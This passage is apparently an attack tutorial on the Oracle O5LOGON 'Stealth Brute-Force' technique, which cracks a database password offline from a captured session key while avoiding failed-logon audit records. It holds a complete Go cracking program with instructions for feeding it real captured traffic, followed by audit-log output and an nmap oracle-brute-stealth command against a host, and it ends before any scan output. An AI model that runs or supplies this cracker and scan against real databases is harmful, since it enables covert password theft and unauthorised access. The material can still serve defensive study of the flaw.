1. Client sends just the username to the server.
2. Server sends the session key (AUTH_SESSKEY), with a known fixed string as padding, which it has encrypted using a key derived from the user's password and a salt; the salt is also sent (AUTH_VFR_DATA). This is a lot of information to give away considering the client has sent only a username.
3. The attacking client can STOP the negotiation at this point, before a Failed Logon is recorded in the audit trail. Hence the name for the attack: "Stealth Brute-Force".
4. The attacker brute-forces AUTH_SESSKEY offline, using prepared password-hash guesses and the supplied salt, until the decryption yields the known fixed-string padding, indicating that the correct guess has been made.
Algorithmically, the calculation to decrypt the session key can be described as follows:
CLEARTEXT_AUTH_SESSKEY_WITH_PADDING = AES192_DECRYPT_CBC(AUTH_SESSKEY, KEY = SHA1({pass} + SALT) || 0x00*4)
where SALT is the AUTH_VFR_DATA value sent by the server, || denotes concatenation, and the four zero bytes pad the 20-byte SHA1 digest to the 24-byte key length AES-192 requires.
Only {pass} is unknown, so it can be guessed automatically: substitute each candidate password, derive the key, decrypt, and stop when the known padding is revealed, which indicates that the guess was correct. Each guess costs one SHA1 and one AES-192 decryption and is performed entirely offline against the captured AUTH_SESSKEY, so the database never sees the attempts. Next is a practical demonstration of the attack process, in which the nmap network scanner is used to capture an encrypted session key.
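Before the live demonstration, the formula above as working code. This is an added example, not code from the original page or from the nmap script: a Go program (chosen because its standard library supplies SHA1 and AES-192-CBC with no external dependencies) that simulates the server's step 2 reply and then runs the offline step 4 loop against it. The 8-byte 0x08 padding, the all-zero CBC IV, the 40-byte session-key length, the salt value and the word list are assumptions constructed for the example; the function names are the example's own.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"encoding/hex"
	"errors"
	"fmt"
)

// Fixed padding that follows the 40-byte session key before encryption. The page
// only says the padding is a known fixed string; eight 0x08 bytes is an
// assumption made for this example.
var knownPadding = bytes.Repeat([]byte{0x08}, 8)

// All-zero CBC IV: an assumption for this example, since the page does not
// state the IV. The simulated server and the cracker must agree on it.
var zeroIV = make([]byte, aes.BlockSize)

// deriveKey implements KEY = SHA1({pass}+SALT) || 0x00*4 from the formula above:
// a 20-byte SHA1 digest padded with four zero bytes to a 24-byte AES-192 key.
func deriveKey(password string, salt []byte) []byte {
	h := sha1.New()
	h.Write([]byte(password))
	h.Write(salt)
	return append(h.Sum(nil), 0, 0, 0, 0)
}

// serverChallenge stands in for the real server in step 2: it generates a random
// 40-byte session key, appends the known padding and encrypts the result under
// the password-derived key. The return value plays the role of AUTH_SESSKEY;
// the salt the caller passed in plays the role of AUTH_VFR_DATA.
func serverChallenge(password string, salt []byte) ([]byte, error) {
	sessKey := make([]byte, 40)
	if _, err := rand.Read(sessKey); err != nil {
		return nil, err
	}
	plain := append(sessKey, knownPadding...) // 48 bytes = 3 AES blocks
	block, err := aes.NewCipher(deriveKey(password, salt))
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, zeroIV).CryptBlocks(out, plain)
	return out, nil
}

// decryptSessKey is the AES192_DECRYPT_CBC step: it returns
// CLEARTEXT_AUTH_SESSKEY_WITH_PADDING for one candidate key.
func decryptSessKey(authSessKey, key []byte) ([]byte, error) {
	if len(authSessKey) == 0 || len(authSessKey)%aes.BlockSize != 0 {
		return nil, errors.New("AUTH_SESSKEY is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(authSessKey))
	cipher.NewCBCDecrypter(block, zeroIV).CryptBlocks(out, authSessKey)
	return out, nil
}

// stealthBruteForce is step 4 run offline: every guess is checked against the
// captured AUTH_SESSKEY and salt, and the first guess whose decryption ends in
// the known padding is reported. No further packets go to the database.
func stealthBruteForce(authSessKey, salt []byte, guesses []string) (string, bool) {
	for _, guess := range guesses {
		plain, err := decryptSessKey(authSessKey, deriveKey(guess, salt))
		if err != nil {
			return "", false // malformed capture; no guess can ever match
		}
		if bytes.HasSuffix(plain, knownPadding) {
			return guess, true
		}
	}
	return "", false
}

func main() {
	// Constructed sample: the salt stands in for a captured AUTH_VFR_DATA value
	// and the password is the one set on the SYS account in the demonstration.
	salt := []byte("0123456789")
	authSessKey, err := serverChallenge("MYpassword_12", salt)
	if err != nil {
		panic(err)
	}
	fmt.Println("captured AUTH_SESSKEY:", hex.EncodeToString(authSessKey))
	wordlist := []string{"oracle", "manager", "change_on_install", "MYpassword_12"}
	if pw, ok := stealthBruteForce(authSessKey, salt, wordlist); ok {
		fmt.Println("password recovered:", pw)
	} else {
		fmt.Println("no guess in the wordlist matched")
	}
}
```

Run it with go run. To point it at real traffic, feed stealthBruteForce the AUTH_SESSKEY and AUTH_VFR_DATA bytes recovered from a capture instead of the simulated serverChallenge output, provided the padding and IV assumptions match the target version. A wrong key decrypts to effectively random bytes, so the 8-byte padding check gives a false positive with probability about 2^-64 per guess.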
First, the database settings showing that auditing is turned on, so that a failed logon would normally be recorded:
SQL> sho parameter audit;
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest string /u01/app/oracle/admin/orcl/adump
audit_sys_operations boolean TRUE
audit_syslog_level string LOCAL6.INFO
audit_trail string DB_EXTENDED
SQL> alter user sys identified by MYpassword_12 ;
User altered.
root@linuxbox $ tail -f /var/log/oracle.log
May 24 00:43:47 linuxbox Oracle Audit[19255]: LENGTH : '183' ACTION :[30] ' alter user sys identified by * ' DATABASE USER:[1] '/' PRIVILEGE :[6] 'SYSDBA' CLIENT USER:[6] 'oracle' CLIENT TERMINAL:[5] 'pts/4' STATUS:[1] '0' DBID:[10] '1230122245'
root@orlin $ cat /home/oracle/john/pcap/userdb
SYS
Then use nmap to capture the key:
root@orlin $ /usr/bin/nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=DB11g,userdb=/home/oracle/john/pcap/userdb,passdb=/home/oracle/john/pcap/passdb 192.168.0.33 --datadir.
 